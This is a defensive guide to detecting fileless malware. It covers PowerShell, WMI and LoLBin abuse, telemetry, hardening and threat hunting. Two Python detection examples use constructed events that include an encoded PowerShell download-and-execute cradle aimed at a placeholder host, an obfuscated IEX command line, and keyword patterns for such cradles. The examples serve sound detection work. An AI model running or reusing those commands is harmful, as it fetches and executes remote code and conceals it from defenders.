Detecting fileless malware: a complete guide to spotting and stopping malware in memory

Last updated: 16/11/2025

  • Fileless malware lives in memory and abuses legitimate tools (PowerShell, WMI, LoLBins), which makes file-based detection difficult.
  • The key is to monitor behaviour: process relationships, command lines, Registry, WMI and network, with fast response at the endpoint.
  • Layered defence combines interpreter restrictions, macro management, patching, MFA and EDR/XDR with rich telemetry and a 24/7 SOC.

Attacks that run without leaving a trace on disk have become a major headache for many security teams, because they operate in memory and abuse legitimate system processes. Hence the importance of knowing how to detect fileless malware and how to protect yourself against it.

Beyond headlines and trends, understanding how these attacks work, why they go unnoticed and which signals let us spot them makes the difference between containing an incident and regretting a breach. In the following lines we analyse the problem and propose solutions.

What is fileless malware and why does it matter?

Fileless malware is not a specific family but a way of operating: it avoids writing executables to disk and uses services and binaries already present on the system to run malicious code. Instead of leaving an easily detectable file, the attacker abuses trusted components and keeps the malicious logic in RAM.

These practices are usually grouped under the 'Living off the Land' philosophy: attackers instrumentalise native tools such as PowerShell, WMI, mshta, rundll32 or scripting engines like VBScript and JScript to achieve their objectives with minimal noise.

Among its most representative traits we find execution in volatile memory, little or no persistence on disk, use of signed system components and a high capacity for evading signature-based engines.

Although many payloads disappear after a reboot, don't be fooled: adversaries can establish persistence by setting Registry keys, WMI subscriptions or scheduled tasks, all without leaving suspicious binaries on disk.

Challenges in detecting fileless malware

Why is fileless malware so hard to detect?

The first obstacle is obvious: there is no unusual file to analyse. Traditional antivirus products, built on signatures and file scanning, have little room to manoeuvre when execution lives inside running processes and the malicious logic resides in memory.

The second is more subtle: attackers hide behind legitimate system administration processes. If PowerShell or WMI are used every day for management tasks, how do you tell normal use from malicious use without context and behavioural telemetry?

Furthermore, blocking critical tools outright is not feasible. Disabling PowerShell or Office macros across the whole fleet can break operations and does not fully prevent abuse, because there are many alternative execution paths and evasion techniques that bypass simple blocks.

On top of all this, cloud-based or server-side detection arrives too late to prevent the damage. Without real-time visibility at the endpoint into what matters (command lines, process relationships and log events), the agent cannot cut off on the fly a malicious flow that leaves no explanation on disk.

How a fileless attack works from start to finish

Initial access usually happens through the same vectors as always: phishing with Office documents that ask the user to enable content, links to compromised sites, exploitation of vulnerabilities in exposed applications, or abuse of leaked credentials to get in through RDP or other services.

Once inside, the adversary aims to execute without touching the disk. To do so, they chain system functions: macros or DDE in documents that launch commands, exploitation of RCE flaws, or calls to trusted binaries that allow code to be loaded and run in memory.

If the operation needs to continue, persistence can be achieved without dropping new artefacts: autorun entries in the Registry, WMI subscriptions that react to system events, or scheduled tasks that trigger scripts under certain conditions.

With execution established, the objective dictates the next steps: move laterally, exfiltrate data. This includes stealing credentials, deploying a RAT, mining cryptocurrency or activating file encryption in the case of ransomware. All of it is done, where possible, with functions the system already provides.

Removing evidence is part of the plan: by never writing suspicious binaries, attackers drastically reduce the artefacts available for analysis, blend their activity into the system's normal events and delete their temporary hooks whenever they can.

Techniques and tools they usually rely on

The catalogue is broad, but it almost always revolves around native components and trusted paths. These are some of the most common, always with the same goal of maximising in-memory execution and minimising traces:

  • PowerShell: powerful scripting, access to Windows APIs and automation. Its versatility makes it a favourite for both administration and abuse.
  • WMI (Windows Management Instrumentation): allows querying and reacting to system events, as well as executing remote and local actions; useful for persistence and orchestration.
  • VBScript and JScript: engines present in many environments that make it possible to run logic through system components.
  • mshta, rundll32 and other trusted binaries: the well-known LoLBins which, chained properly, can run code without dropping visible artefacts on disk.
  • Documents with active content: Office macros or DDE, as well as PDF readers with advanced features, can serve as the trigger that launches commands in memory.
  • Windows Registry: autorun keys or encrypted/hidden storage of payloads that are reconstructed by system components.
  • Process hooking and injection: manipulating the memory space of running processes to host malicious logic inside legitimate executions.
  • Exploit kits: identification of vulnerabilities on the victim's system and delivery of tailored routines that achieve execution without touching the disk.

The corporate dilemma (and why just blocking everything is not enough)

The naive approach suggests a drastic measure: block PowerShell, ban macros, disable binaries such as rundll32. The reality is more nuanced: many of these tools are essential to day-to-day IT operations and management automation.

Furthermore, attackers look for gaps: launching the scripting engine through alternative paths, using other copies, embedding logic in images or turning to less monitored LoLBins. Brute-force blocking ends up creating friction without delivering complete protection.

Server-side or cloud-based analysis alone does not solve the problem either. Without rich endpoint telemetry and without response capability in the agent itself, the decision arrives late and prevention is impossible, because we have to wait for an external verdict.

Meanwhile, market reports have consistently pointed to significant growth in this area, and in particular attempts to misuse PowerShell doubled in a short period, which confirms that it is a recurring and profitable technique for adversaries.

Modern detection: from files to behaviour

What matters is not who executes, but how and why. Monitoring process behaviour and the relationships between processes is decisive: command line, parent-child lineage, sensitive API calls, outbound connections, Registry changes and WMI events.

This approach drastically shrinks the room for evasion: even if the binaries involved change, the attack patterns repeat (scripts that download and execute in memory, abuse of LoLBins, calls to interpreters, and so on). Analysing the script, not the 'identity' of the file, improves detection.

Effective EDR/XDR platforms go beyond signatures to reconstruct the full story of the incident and show its root cause. Instead of flagging 'exposed' processes, this narrative links attachment, macro, interpreter, payload and persistence to stop the whole flow, not an isolated piece.

Using frameworks such as MITRE ATT&CK helps map the observed tactics and techniques (TTPs) and steer threat hunting towards the behaviours of interest: execution, persistence, defence evasion, credential access, discovery, lateral movement and exfiltration.

Finally, response orchestration at the endpoint must be fast: isolate the device, terminate the processes involved, revert changes to the Registry or task scheduler and block suspicious outbound connections without waiting for external confirmation.

Useful telemetry: what to watch and where to start

To raise the chances of detection without saturating your systems, it is advisable to prioritise high-value signals. Some sources and controls that provide critical context for fileless activity are:

  • Deep logging of PowerShell and other interpreters: script block logging, command history, loaded modules and AMSI events, where available.
  • WMI repository: inventory and alerts on the creation or modification of event filters, consumers and bindings, especially in sensitive namespaces.
  • Security events and Sysmon: process correlation, image integrity, memory loads, injections and creation of scheduled tasks.
  • Network: anomalous outbound connections, beaconing, payload download patterns and use of covert exfiltration channels.

Automation helps separate the wheat from the chaff: behaviour-based detection rules, allow-lists for legitimate administration and enrichment with threat intelligence reduce false positives and speed up response.
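The behavioural correlation described under "Modern detection" and the telemetry sources listed above, put together in code. This is an added example, not code from the original article or from any EDR vendor: it reads constructed Sysmon-style records (the event IDs follow the public Sysmon schema, the records themselves are made up), reconstructs the parent-child chain behind each suspicious step, tags it with the MITRE ATT&CK technique ID it corresponds to, and lists the endpoint actions the article describes. The event field names, the `RESPONSE` table and the `example.invalid` host are assumptions made for this example.

```python
"""Behaviour-based correlation over Sysmon-style endpoint events.

Added example, not code from the original article.  Record shapes follow the
public Sysmon event IDs (1 process create, 3 network connect, 13 registry value
set, 20 WMI consumer, 21 WMI filter-to-consumer binding); field names, sample
events and response actions are constructed for this example.
"""
import base64
import ntpath
import re
from collections import defaultdict

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.IGNORECASE)
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
CRADLE_WORDS = ("downloadstring", "downloadfile", "invoke-expression", "iex", "frombase64string")
WMI_SCRIPT_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
RESPONSE = {  # endpoint actions the article lists, keyed by ATT&CK technique (assumed mapping)
    "T1204.002": "isolate the host and terminate the spawned interpreter",
    "T1546.003": "remove the WMI filter, consumer and binding",
    "T1547.001": "delete the autorun value",
    "T1071": "block the destination at the host firewall",
}


def basename(path):
    return ntpath.basename(path).lower()


def ps_encode(script):
    """PowerShell -EncodedCommand takes base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def ps_decode(blob):
    try:
        return base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyse(events):
    """Single pass over the events; returns the process table and (pid, technique, detail) findings."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    consumers, findings = {}, []
    for e in events:
        pid = e["pid"]
        if e["id"] == 1:
            parent = procs.get(e["ppid"])
            child = basename(e["image"])
            if parent and basename(parent["image"]) in OFFICE and child in INTERPRETERS:
                findings.append((pid, "T1204.002", f"{basename(parent['image'])} spawned {child}"))
            m = ENC_FLAG.search(e["cmd"])
            if m:
                decoded = ps_decode(m.group(1))
                findings.append((pid, "T1027", "encoded command line"))
                if any(w in decoded.lower() for w in CRADLE_WORDS):
                    findings.append((pid, "T1059.001", "in-memory download cradle: " + decoded[:50]))
        elif e["id"] == 20:
            consumers[e["consumer"]] = e["type"]
        elif e["id"] == 21 and consumers.get(e["consumer"]) in WMI_SCRIPT_CONSUMERS:
            findings.append((pid, "T1546.003", f"WMI binding {e['filter']} -> {e['consumer']}"))
        elif e["id"] == 13 and RUN_KEY.search(e["target"]):
            findings.append((pid, "T1547.001", "autorun value set: " + e["target"].rsplit("\\", 1)[-1]))
        elif e["id"] == 3 and any(f[0] == pid for f in findings):
            findings.append((pid, "T1071", "outbound connection from flagged process: " + e["dest"]))
    return procs, findings


def lineage(procs, pid):
    """Walk parent pointers to rebuild root -> ... -> pid."""
    chain = []
    while pid in procs:
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain[::-1]


def incident_report(events):
    """Group findings per process into the story an EDR would show: chain, TTPs, actions."""
    procs, findings = analyse(events)
    grouped = defaultdict(list)
    for pid, tech, detail in findings:
        grouped[pid].append((tech, detail))
    return {
        pid: {
            "chain": " -> ".join(lineage(procs, pid)),
            "techniques": sorted({t for t, _ in items}),
            "details": [d for _, d in items],
            "actions": sorted({RESPONSE[t] for t, _ in items if t in RESPONSE}),
        }
        for pid, items in grouped.items()
    }


# Constructed telemetry: an Office document spawning a hidden encoded PowerShell that
# installs WMI and Run-key persistence, next to a benign scheduled inventory script.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"id": 1, "pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmd": "WINWORD.EXE /n invoice.docm"},
    {"id": 1, "pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc "
            + ps_encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")},
    {"id": 20, "pid": 300, "consumer": "Updater", "type": "CommandLineEventConsumer"},
    {"id": 21, "pid": 300, "filter": "Updater", "consumer": "Updater"},
    {"id": 13, "pid": 300, "target": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"id": 3, "pid": 300, "dest": "203.0.113.7:443"},
    {"id": 1, "pid": 400, "ppid": 1, "image": r"C:\Windows\System32\svchost.exe", "cmd": "svchost.exe -k netsvcs"},
    {"id": 1, "pid": 500, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for pid, story in incident_report(SAMPLE_EVENTS).items():
        print(pid, story)
```

Running the block prints a single entry: the chain explorer.exe -> winword.exe -> powershell.exe with six techniques attached, while the inventory script launched by svchost.exe produces nothing, which is the point of correlating lineage rather than alerting on every PowerShell launch. In production the same rules would consume Sysmon or EDR events from the log pipeline instead of the inline list.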

Prevention and attack surface reduction

No single measure is complete, but defence in depth substantially reduces the risk. On the preventive side, several lines of action stand out for closing vectors and making life harder for the adversary.

  • Macro management: disabled by default and allowed only when necessary and signed; granular controls through group policies.
  • Restriction of interpreters and LoLBins: apply AppLocker/WDAC or equivalent, script control and execution templates with full logging.
  • Patching and hardening: close vulnerabilities and apply memory protections that mitigate RCE and injection.
  • Strong authentication: MFA and zero trust principles to mitigate credential abuse and reduce lateral movement.
  • Awareness and simulation: training on phishing, documents with active content and signs of anomalous execution.

These measures are complemented by solutions that analyse traffic and memory to detect malicious behaviour in real time, together with segmentation and least-privilege policies to contain the impact if something slips through.

Services and approaches that work

In environments with many endpoints and high criticality, managed detection and response services with 24/7 monitoring have proven to speed up incident containment. The combination of SOC, EMDR/MDR and EDR/XDR provides expert eyes, rich telemetry and orchestrated response capabilities.

The most effective offerings have built the shift to behaviour into their design: lightweight agents that correlate activity at kernel level, reconstruct complete attack narratives and apply automatic mitigations when they detect a malicious chain, with rollback capabilities to undo changes.

In parallel, endpoint security suites and XDR platforms integrate centralised visibility and threat management across workstations, servers, identities, email and cloud; the goal is to cut the attack chain regardless of whether files are involved.

Practical signals for threat hunting

If you need to prioritise hunting hypotheses, look at combinations of signals: an Office process that launches an interpreter with unusual parameters, a WMI subscription created right after a document is opened, a change to autorun keys followed by connections to domains with a bad reputation.

Another effective approach is to rely on baselines from your own environment: what is normal on your servers and workstations? Any deviation (recently signed binaries appearing as parents of interpreters, sudden spikes in script execution, command strings with obfuscation) should be investigated.
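The baseline idea in the previous paragraph, as an added example rather than code from the original article: learn from a week of constructed telemetry which parents normally launch interpreters and how many launches per day is normal, then score a new day against that baseline for volume spikes, unseen parents and command lines that look obfuscated. The record fields (day, parent, child, cmd), the sample events and the obfuscation weights are assumptions made for this example, and the encoded text in the sample is a harmless Write-Output.

```python
"""Baseline-driven hunting over process-creation records.

Added example, not code from the original article.  Field names and all
sample records are constructed; the obfuscation weights are a heuristic
chosen for this example, not a published scoring scheme.
"""
import base64
import math
import re
from collections import Counter

INTERPRETERS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe"}


def obfuscation_score(cmd):
    """Heuristic in [0, 1]: obfuscated command lines lean on backticks, carets,
    string concatenation, [char] casts, encoded flags and long base64 blobs,
    which routine admin scripts almost never contain."""
    score = 0.0
    score += min(cmd.count("`") + cmd.count("^"), 5) * 0.1
    score += min(cmd.count("+"), 6) * 0.05
    if re.search(r"\[char\]\s*\d+", cmd, re.IGNORECASE):
        score += 0.25
    if re.search(r"[A-Za-z0-9+/=]{40,}", cmd):
        score += 0.3
    if re.search(r"-(?:enc|encodedcommand|e)\b", cmd, re.IGNORECASE):
        score += 0.2
    return min(score, 1.0)


def build_baseline(events):
    """Record the parent->child pairs seen and the mean/std of daily interpreter launches."""
    pairs = Counter((e["parent"], e["child"]) for e in events)
    daily = Counter(e["day"] for e in events if e["child"] in INTERPRETERS)
    counts = list(daily.values()) or [0]
    mean = sum(counts) / len(counts)
    std = math.sqrt(sum((c - mean) ** 2 for c in counts) / len(counts))
    return {"pairs": pairs, "mean": mean, "std": std}


def hunt(baseline, events, spike_sigma=3.0, obf_threshold=0.4):
    """Return deviations from the baseline: volume spikes, unseen parents of
    interpreters, and command lines that look obfuscated."""
    findings = []
    daily = Counter(e["day"] for e in events if e["child"] in INTERPRETERS)
    threshold = baseline["mean"] + spike_sigma * max(baseline["std"], 1.0)
    for day, n in sorted(daily.items()):
        if n > threshold:
            findings.append(("spike", day, n))
    for e in events:
        pair = (e["parent"], e["child"])
        if e["child"] in INTERPRETERS and pair not in baseline["pairs"]:
            f = ("new_parent", e["parent"], e["child"])
            if f not in findings:
                findings.append(f)
        score = obfuscation_score(e["cmd"])
        if score >= obf_threshold:
            findings.append(("obfuscated", e["child"], round(score, 2)))
    return findings


def make_baseline_events():
    """Constructed 'normal' week: scheduled inventory scripts plus an admin console."""
    events = []
    for day in range(1, 8):
        for i in range(4):
            events.append({"day": day, "parent": "svchost.exe", "child": "powershell.exe",
                           "cmd": f"powershell.exe -File C:\\Scripts\\inventory{i}.ps1"})
        events.append({"day": day, "parent": "explorer.exe", "child": "powershell.exe",
                       "cmd": "powershell.exe -NoProfile"})
    return events


# Constructed "new day": the usual jobs, plus an Office-spawned obfuscated interpreter
# and a burst of encoded launches (the encoded text is a harmless Write-Output).
ENCODED = base64.b64encode(("Write-Output hunt;" * 3).encode("utf-16-le")).decode("ascii")
OBF_CMD = ("powershell.exe -nop -w hidden -c \"$a=('Ne'+'w-Ob'+'ject');"
           "I`E`X ([char]73+[char]69+[char]88)\"")
NEW_DAY = [dict(e, day=8) for e in make_baseline_events() if e["day"] == 1] + [
    {"day": 8, "parent": "winword.exe", "child": "powershell.exe", "cmd": OBF_CMD},
] + [
    {"day": 8, "parent": "cmd.exe", "child": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc " + ENCODED} for _ in range(4)
]

if __name__ == "__main__":
    baseline = build_baseline(make_baseline_events())
    for finding in hunt(baseline, NEW_DAY):
        print(finding)
```

The obfuscation score is deliberately a cheap heuristic: it counts the escape characters, concatenation and casts that administration scripts almost never contain, so it should be treated as a triage signal alongside the lineage and volume deviations, not as a verdict on its own.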

Finally, don't forget memory: if you have tools that inspect running regions or take snapshots, what is found in RAM can be the definitive evidence of fileless activity, especially when there are no artefacts in the file system.

The combination of these practices, techniques and controls does not eliminate the threat, but it puts you in a much better position to detect it in time, cut the chain and minimise the impact.

When all of this is applied wisely (rich endpoint telemetry, behavioural correlation, automated response and selective hardening), the fileless approach loses much of its advantage. And although it will keep evolving, focusing on behaviour rather than files gives your defence a solid foundation to evolve with it.